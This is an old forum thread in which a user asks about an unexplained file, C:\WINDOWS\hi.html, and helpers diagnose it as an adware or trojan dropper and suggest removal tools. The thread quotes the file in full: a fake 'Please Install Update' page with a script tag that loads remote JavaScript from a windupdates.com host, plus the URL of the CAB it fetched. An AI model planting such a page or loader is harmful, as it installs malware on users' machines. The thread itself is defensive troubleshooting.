What is C:\WINDOWS\hi.html? It tries to download NAS trojan!

  • Thread starter Thread starter John Hull
  • Start date Start date
J

John Hull

Hi, I seem to have a strange file resident on my system: C:\WINDOWS\hi.html

The content is:

------------------------------------
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Pop Up...</title>
<font color="#0000FF">Please Install
Update.....</head></font><body></body></html>
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://public.windupdates.com/promp...9fd95f6638&k=e331c7c7cf5988756be0eaf2fe4f185d"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</head>
-------------------------------------

I have NOD32 v2.12.1 (virus signature database: 1.868) installed on my
system. It does not detect this file.

What has been happening is that hi.html has somehow been executed a number
of times by my system (how I do not know).

Now to investigate what this file is, i personally executed hi.html myself,
and Nod32 picked up on the following:

----------
Archive:
http://static.windupdates.com/cab/DownloadsUnlimited/ie/bridge-c6.cab

Virus:
Win32/TrojanDownloader.Small.NAS trojan
----------

Can anyone tell me what I should do? I have run a full scan on NOD32 and
nothing shows.

One interesting thing i have noticed is that when i have NOD32 AMON
antivirus monitor showing, and i start up a browser session, i can see that
AMON is checking the hi.html file. This might be because I have previously
executed the hi.html. But i fail to understand why it checks hi.html when i
try and start up a new browser session.

I have since renamed hi.html. I don't want to just simply delete it as it
might be linked to something else. I want all links removed. I want to find
out how this file was downloaded to my system in the first place.

Any help appreciated!

Peter
 
Hi, I seem to have a strange file resident on my system: C:\WINDOWS\hi.html

The content is:

------------------------------------
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Pop Up...</title>
<font color="#0000FF">Please Install
Update.....</head></font><body></body></html>
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://public.windupdates.com/promp...9fd95f6638&k=e331c7c7cf5988756be0eaf2fe4f185d"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</head>
Click to expand...

Nothing there to alert on that I can see. But you can upload suspect
files for av scanning to these sites:

http://www.virustotal.com/flash/index_en.html
http://virusscan.jotti.dhs.org/
What has been happening is that hi.html has somehow been executed a number
of times by my system (how I do not know).

Now to investigate what this file is, i personally executed hi.html myself,
and Nod32 picked up on the following:

----------
Archive:
http://static.windupdates.com/cab/DownloadsUnlimited/ie/bridge-c6.cab

Virus:
Win32/TrojanDownloader.Small.NAS trojan
Click to expand...

The WinadX.dll file in that archive is detected as adware by several
av scanners. KAV calls it AdvWare.Winad. It's called Winupdt by Bit
Defender. Panda calls it WUpd.

I suggest the use of Ad-Aware by Lavasoft. And run Spybot as well.
Links are at my web site. Also try the Escan av Toolkit Utility to
remove Trojans that NOD32 can't detect.
One interesting thing i have noticed is that when i have NOD32 AMON
antivirus monitor showing, and i start up a browser session, i can see that
AMON is checking the hi.html file. This might be because I have previously
executed the hi.html. But i fail to understand why it checks hi.html when i
try and start up a new browser session.

I have since renamed hi.html. I don't want to just simply delete it as it
might be linked to something else. I want all links removed. I want to find
out how this file was downloaded to my system in the first place.
Click to expand...

You either installed some software infested with adware or you pick it
up on the internet using IE with security settings less than absolute
maximum. Use a different browser such as Mozilla, Firefox, K-Meleon or
Opera.


Art
http://www.epix.net/~artnpeg
 
Nothing there to alert on that I can see. But you can upload suspect
files for av scanning to these sites:
Click to expand...

'public.windupdates.com' in the javscript looks bogus... just an empty
page. Perhaps there was something there in the past... or maybe its just a
placeholder related to 'static.windupdates.com' listed later in the scan.


The 'public' page has only this:
<html>
<body>
</body>
</html>
 
Theo said:
'public.windupdates.com' in the javscript looks bogus... just an empty
page. Perhaps there was something there in the past... or maybe its just a
placeholder related to 'static.windupdates.com' listed later in the scan.


The 'public' page has only this:
<html>
<body>
</body>
</html>
Click to expand...

Using the whole URL, I got a zero length "prompt.js" file. Could be it was defanged.
 
Back
Top